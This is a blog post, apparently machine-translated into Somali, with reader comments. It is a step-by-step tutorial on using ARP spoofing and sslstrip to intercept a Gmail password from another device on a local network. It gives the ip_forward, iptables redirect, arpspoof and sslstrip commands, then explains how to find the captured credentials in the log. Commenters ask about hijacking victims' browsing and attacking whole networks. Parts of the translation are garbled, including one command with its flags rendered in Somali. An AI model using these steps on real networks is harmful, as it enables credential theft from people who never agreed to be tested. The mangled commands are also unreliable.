Salaan Bloggers.
Maanta waxaan hayaa muunad yar oo ah sida halista ay u noqon karto in lagu xidho shabakad kasta oo aan la hubin oo kuwa badan oo naga mid ahi jecel yihiin.
Maanta, waxaan u isticmaali doonaa ArpSpoofing Sslstrip si aan u helo lambarka sirta ah ee 'Gmail'. Si deegaanka looga dhigo mid la xakameeyo, waxaan sameeyay koonto la yiraahdo "testarp@gmail.com".
Maaddaama aanan aad u jeclayn hordhaca, aan hoos ugu degno ganacsiga.
DEEGAANKA
Tijaabadan waxa aan hayno waa kuwan soo socda:
1. Weerar: Waa desktop-kayga ama kumbuyuutarka desktop-ka ee leh Debian Wheezy. Keydadka waxaad ka rakiban kartaa sslstrip y dhuuqin si loo helo arppoofing
2. Dhibbane: Dhibbanuhu waa Tablet-ka Android-ka oo kaliya doonaya inuu ka arko mailkiisa marinka biraawsarka.
3. Dhexdhexaad: Dhexda waa aniga Cisco DPC2425 router
CINWAANADA.
Cinwaanka Weerarka: 172.26.0.2
Cinwaanka router: 172.26.0.1
Cinwaanka Dhibbanaha: 172.26.0.8
Weerarka:
Waxa ugu horeeya ee aan ku sameyn doono weerarkan waa inaan dhaqaajino dhanka hore si markaa kumbuyuutarkeena uu macluumaadka ugu gudbiyo dhibanaha iyagoon ogaanin. (Haddii kale waxay noqon doontaa diidmada weerarada adeegyada)
Taas waxaan u isticmaali doonaa:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Hadda haddii aan samayno dabada -f desdelinux Waxaan u aragnaa macluumaadka si toos ah oo toos ah
Marka markaa sidee ku helnaa waxa aan dooneyno?
Aynu marka hore galno boostadayada ku taal Kiniinka. Markaad gasho, waxaan aragnaa kumanaan iyo kumanaan shey inay ka muuqdaan konsoleheena.
Hadda markay dhammaatay aynu furno galkeena”desdelinux" oo leh nano
nano desdelinux
iyadoo la adeegsanayo Control + W waxaan raadineynaa wax la yiraahdo SECURE POST.
Oo waxaan arki doonaa wax sidan oo kale ah.
Khadadkaas weyn ee aan la arki karin waxaa ka mid ah e-mayga dhibbanaha iyo erayga sirta ah.
Marka waxaan u ordaynaa dhanka midig ilaa aan aakhirka ka aragno nalka dhamaadka godka.
Munaasabad kale ayaynu arki doonaa sida aan waxoogaa uga badbaadin karno weerarradan.
Salaan
Waxaan fursaddan uga faa'iideysanayaa inaan dhaho markii boostada la daabacay, amarradu sax ma ahayn.
Amarka iptables ee dhamaadka ayaa la la'yahay 8080 kii ku hadhay xariiq kale. Ka dibna amarrada arpspoof dhammaantood waxay ku jireen isla xariiq. Amar kastaa wuxuu ku socdaa xariiq kale.
Waxaan rajeyneynaa in tifaftiraha uu arko uuna hagaajin karo.
Thanks.
Waan sameeyay sixitaanka aad sheegayso, taasi waa caadi?
Haddii aad geli doontid koodh gelitaan doorbid ah, isticmaal aragtida HTML, oo xaqiiji in maqaalka sax yahay ka hor inta aanad u dirin sugitaanka. Mahadsanid.
Waa murugo in la ogaado in kuweena aan aqoonta lahayn ay sidaa u nugul yihiin. Macluumaad aad u wanaagsan xitaa markaan wax yar ka fahmo mowduuca waxaan garwaaqsanahay muhiimadda. Mahadsanid!
Salaan
Laakiin taasi waxay shaqeysaa oo keliya haddii qofka wax weeraray iyo dhibanaha ay isku shabakad yihiin. Sikastaba xaalku ha ahaadee, aniga waxay ila tahay in haddii (aad isku shabakad tahay) aad isku xirto adoo adeegsanaya HTTPS taas oo aan dhicin maxaa yeelay xogta waa la duubay kahor intaadan mashiinkaaga ka bixin. Haddii aad ku xirto HTTP (la'aanteed S) waxaan u maleynayaa in xitaa fiirinta fiilada shabakada aad aragto furayaasha.
Run maahan. Waxaan jabsanayaa lambarka sirta ah ee gmail oo hadaad ogaato gmail wuxuu adeegsadaa https. Marka? Muhiimadu waxay tahay in kasta oo https amni yahay, hadana waxay kuxirantahay http. Marka sidaa uma bad badna.
Wax badan ha ka qiran https in S uusan u aheyn Superman ee ay tahay "badbaado"
waxay la shaqeysaa https la'aan ama la'aan, waxaan ku tijaabiyay Linux Linux gaar ah oo takhasus leh waxayna u shaqeysaa dhibaato la'aan
Waxaad si hufan ugu adeegsan kartaa inaad cashar u dhigto kuwa xada Wi-Fi-gaaga. 😀
Waa wax ka yar ama ka yar sidii ay u sheegeen waqti dheer ka hor barta Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, wax weyn ayey qabataa! / Kadibna waxay u sheegaan nacasnimadayda mar kasta oo aan isticmaalo VPN marka ay tagayaan inay hubiyaan koontada bangiga…). Adoo maraya waa inaad aragtaa sida dadka caqli-xumadu ugu jiraan faallooyinka ... haddii aakhirka ay wax xadayaan ...
Hadda waxaan u baahanahay inaan qaadanno casharro ku saabsan sida loo abuuro loona bixiyo adeeggaaga VPN u gaarka ah.
Sheekada aad xiriirineyso waa mid aad u xiiso badan, xitaa waxay u muuqataa mid mudan buug cusub, tanina waxay igu xusuusineysaa markii aan adeegsaday internet-ka deriskeyga in kastoo aan idhaahdo waan ogahay mowduuca, waxaan u maleynayaa inaanan weligey arki karin cabirka dhabta ah ee halista aan yeelan karo ugu dambayn, nasiib wanaag aniga ahaan, waxay kaliya u beddeleen lambarka sirta ah ee WPA2 waana halkaas meesha sheekadayda ISP ay ka bilaabatay haha
Taasi waa sababta cinwaanku u leeyahay Sslstrip ficil ahaan.
Way shaqeysaa, illaa iyo inta weeraryahanku dhexda ku jiro
Waa maxay mawjada aad ka shaqeyso prism? -.-
no.
Maxaad sugeysaa inaad soo dirto codsigaaga XD
Salaan
post wanaagsan
Xiiso leh, mar dambe ayaan sameyn doonaa imtixaan waxbarasho ... Waxaa laga yaabaa inaan xitaa ka saari karo lambarka sirta ah ee WiFi oo aan ku raaxeysto xoogaa 😛
Fursad kasta, ma sameyn kartaa wax la mid ah si aad ugu dirto bogag kala duwan kuwa bartilmaameedka la codsaday? Tusaale ahaan, waxay rabaan inay furaan Facebook anigana waxaan u weeciyaa Google? 😛
Haa. Laakiin dhammaantood waa duub aad u kala duwan.
Malaha gadaal baan soo dhigi doonaa.
boostada aad u wanaagsan, mowduucyadan waa kuwo aad wax u baraya, hadda waxaan u baahanahay inaan awoodno inaan ka hortagno weerarkan, maaddaama qaar (sida aniga oo kale) ay ku xirmaan shabakadaha bulshada (tusaale ahaan jaamacadda) way fiicnaan laheyd in laga fogaado.
Waad ku mahadsan tahay!
Way ii shaqeyn weyday 🙁
Waxbaa igu fashilmay halkan, marka laga reebo xaqiiqda ah in isku xirnaanta https ay ku kaydsan yihiin shahaado server ah (marka aad shahaadada ku haysato mashiinkaaga, biraawsarkaaga ayaa mas'uul ka ah qarinta) iyadoo la adeegsanayo iptable-ka waxaad u wareejin kartaa dekedda 80 (http), ma ahan 443 oo ah https
Taasna waan u maleeyay. Muhiimadu waxay tahay in kasta oo https uu "aamin yahay" hadana nasiib daro waxay kuxirantahay http. Marka sslstrip ayaa ka faa'iideysanaya taas, waxay ka dhigeysaa biraawsarka inuu aamino inuu adeegsanayo aqoonsiyada https laakiin maahan.
xaaraan quduus ah! laakiin biraawsarka waa inuu arkaa digniin sida "shahaadadan waxay ka timid goob laga shakisan yahay ama wax la mid ah" ... Xaqiiqdii waa inaan sameeyaa baaritaano XD
Maya, gabi ahaanba waxba ma soo baxaan.
Ugu dambeyntii way ii shaqeysay
Waxaan ku xiranahay shabakad WEP ah oo leh lambar sir ah, waxayna si toos ah ii tustay furaha.
Weydiin. Miyaad samayn kartaa isla nidaamkan laakiin dhammaan kombiyuutarada ku xiran shabakadda, halkii aad ka yeelan lahayd hal dhibbane?
Haa waad awoodaa. Laakiin ma aanan samayn tijaabooyin. Isku day naftaada oo noo sheeg sida aad tahay.
Waxa kaliya ee aan ku helo tan waa in mashiinka dhibbanaha uu khad ka baxo, laakiin sslstrip wax iima tusayo: /
Waxaad ubaahantahay inaad dajiso firewall daqiiqad. Ama ugu yaraan awood u yeelo isku xirnaanta soo socota.
Aniga iyo baaritaanka waxaan arki karnaa oo kaliya magaca iyo lambarka sirta ah ee bogga facebook, gmail ma aanan helin wax natiijo ah oo ku saabsan qoraalka, sidoo kale waxaan ubaahanahay kaliya qadka arpspoof «arpspoof -i -t«. Dhinaca kale, mashiinka dhibbanaha ma furi karin bogagga qaarkood. Waan sii wadi doonaa baaritaanka, waa mid aad u xiiso badan. Caawinta kuwa isticmaala Manjaro, xirmooyinka ay ku rakibayaan waa: dsniff (halkan waa arpspoff), qalloocan iyo python2-pyopenssl. Sslstrip ayaa lagala soo bixi karaa halkan: http://www.thoughtcrime.org/software/sslstrip/
Si aad u socodsiiso $ python2 sslstrip.py
Thanks.
Ma soo bixin laakiin khadka arpspoof waa: #arpspoof -i int -t ip-victim ip-router
fiiri waxaan sameeyaa sida saxda ah ee aad dhahdo:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j SALDHIG –in-dekedaha 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
dhibaatadu waxay tahay dhibanaha oo ah pc kale oo aan halkan ku haysto qolkeyga, wax xiriir ah oo aan la leeyahay ma jirto ilaa iyo meesha ay tahay inaan dib u bilaabo routerka, maxaan sameyn karaa oo i caawin kara.
Midda kale, waxaan la shaqeynayaa mishiin kumbuyuutar ah, markii aan fulinayo amarka iwconfig, wlan0 ma muuqdo, mana markaan fulinayo ifconfig, si kastaba ha noqotee, haddii aan internetka ku haysto mishiinkeyga meertada ah, maxaa leh interface eth0.